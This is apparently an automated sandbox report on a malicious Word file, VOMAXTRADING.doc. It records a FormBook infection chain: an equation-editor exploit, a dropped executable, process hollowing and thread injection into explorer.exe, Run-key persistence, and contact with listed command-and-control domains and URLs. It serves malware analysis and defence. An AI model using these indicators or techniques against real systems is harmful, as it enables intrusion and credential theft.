          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_009526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02130080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021300EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_009526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 198.49.23.141 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 50.117.11.156 80
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory written: C:\Users\user\AppData\Roaming\skypound83892.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: CD0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Queries volume information: C:\Users\user\AppData\Roaming\skypound83892.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Each row lists one technique per tactic column; digits after a technique name are the superscript annotations shown in the original matrix.

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Registry Run Keys / Startup Folder 11 | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 11 | Virtualization/Sandbox Evasion 3 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 323039; Sample: VOMAXTRADING.doc; Start date: 26/11/2020; Architecture: WINDOWS; Score: 100. The rendered graph and its icon legend are not reproduced here; the nodes and edges recoverable from the page are:

          • Sample: DNS/IP www.akasyaofistasima.com, akasyaofistasima.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Malicious sample detected (through community Yara rule), Multi AV Scanner detection for submitted file, 7 other signatures; started WINWORD.EXE and two EQNEDT32.EXE instances.
          • EQNEDT32.EXE: DNS/IP sea-shared-5.masterns.com (104.168.198.45, 49167, 80, HOSTWINDSUS, United States); dropped C:\Users\user\AppData\...\skypound83892.exe (PE32) and C:\Users\user\AppData\...\skypoundx[1].exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started skypound83892.exe.
          • skypound83892.exe: dropped C:\Users\user\AppData\Roaming\...\firefos.exe (PE32); signatures: Machine Learning detection for dropped file, Tries to detect virtualization through RDTSC time measurements, Injects a PE file into a foreign processes; started a second skypound83892.exe.
          • skypound83892.exe (second instance): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); injected into explorer.exe.
          • explorer.exe (injected): DNS/IP mycapecrusade.com (34.102.136.180, 49170, 80, GOOGLEUS, United States), www.opel-occasions-ales.com (50.117.11.156, 49168, 80, EGIHOSTINGUS, United States), 4 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit); started NAPSTAT.EXE and two firefos.exe instances.
          • NAPSTAT.EXE: signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; started cmd.exe.
          • firefos.exe (two instances started by explorer.exe): one is flagged Injects a PE file into a foreign processes; each started a further firefos.exe.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          VOMAXTRADING.doc | 43% | Virustotal |
          VOMAXTRADING.doc | 40% | ReversingLabs | Document-RTF.Trojan.Wacatac

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\skypound83892.exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          15.2.firefos.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          16.2.firefos.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.skypound83892.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.opel-occasions-ales.com | 0% | Virustotal |

          URLs

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.opel-occasions-ales.com | 50.117.11.156 | true | true | | unknown
          mycapecrusade.com | 34.102.136.180 | true | true | | unknown
          sea-shared-5.masterns.com | 104.168.198.45 | true | true | | unknown
          akasyaofistasima.com | 89.252.180.207 | true | false | | unknown
          ext-sq.squarespace.com | 198.49.23.141 | true | false | | high
          www.akasyaofistasima.com | unknown | unknown | true | | unknown
          www.mycapecrusade.com | unknown | unknown | true | | unknown
          www.musmarservices.com | unknown | unknown | true | | unknown
          www.runwithit.media | unknown | unknown | true | | unknown

                          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.runwithit.media/bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB | true | Avira URL Cloud: safe | unknown
          http://www.opel-occasions-ales.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                  high
                                                                                                  http://www.amazon.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://sads.myspace.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://search.sify.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://search.ebay.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.nifty.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.google.si/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.google.cz/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.soso.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.univision.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.ebay.it/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://busca.orange.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.target.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://buscador.terra.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.iask.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.tesco.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.interpark.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://investor.msn.com/explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.espn.go.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://service2.bfast.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown

Contacted IPs

(Distribution chart omitted; legend categories: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs)

Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.49.23.141 | unknown | United States | 53831 | SQUARESPACEUS | false
104.168.198.45 | unknown | United States | 54290 | HOSTWINDSUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
50.117.11.156 | unknown | United States | 18779 | EGIHOSTINGUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323039
Start date: 26.11.2020
Start time: 08:43:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: VOMAXTRADING.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.expl.evad.winDOC@18/9@6/4
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 27.7% (good quality ratio 26.2%)
                                                                                                                                                            • Quality average: 72.7%
                                                                                                                                                            • Quality standard deviation: 29.4%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .doc
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:43:38 | API Interceptor | 212x Sleep call for process: EQNEDT32.EXE modified
08:43:40 | API Interceptor | 143x Sleep call for process: skypound83892.exe modified
08:44:04 | API Interceptor | 148x Sleep call for process: explorer.exe modified
08:44:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefos "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe"
08:44:18 | API Interceptor | 162x Sleep call for process: firefos.exe modified
08:44:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefos "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe"
08:44:35 | API Interceptor | 145x Sleep call for process: NAPSTAT.EXE modified

Joe Sandbox View / Context

IPs


Domains


ASN

                                                                                                                                                            HOSTWINDSUShttp://email.balluun.com/ls/click?upn=KzNQqcw6vAwizrX-2Fig1Ls6Y5D9N6j9I5FZfBCN8B2wRxBmpXcbUQvKOFUzJGiw-2F3Qy64T8VZ2LXT8NNNJG9bemh7vjcLDgF5-2FXPBBBqdJ0-2BpvIlXlKrZECAirL9YySN2b1LT-2Bcy1l-2F0fp1Pwvv3I4j7XHHKagv-2FxlVdd85P38ZuA-2Bvv5JF3QaAOx19sqG0-2BnULpm_J-2BsRItFMcwpTA18DVdBlGBJyUhFuIaAEybVNgKjH795y-2Bjn2esAEGPPa76dl-2BxD62wo4xT0BtNrFdVu0eWgx-2F6eRqupI7yZWQAa-2FBr1dlsLgX0hlcDSdDmAHsaZaG3WUUyADLR7thqFcU32Djt0AEfQ9qS0428-2BH1u-2Fk1E3KVFo9IePxc9mOWOHzwBkFv-2FOdeNUShdwqtjGBw2zuSNSTyLDRcypBOMpUtPdiR8ihMQ0-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.173.52
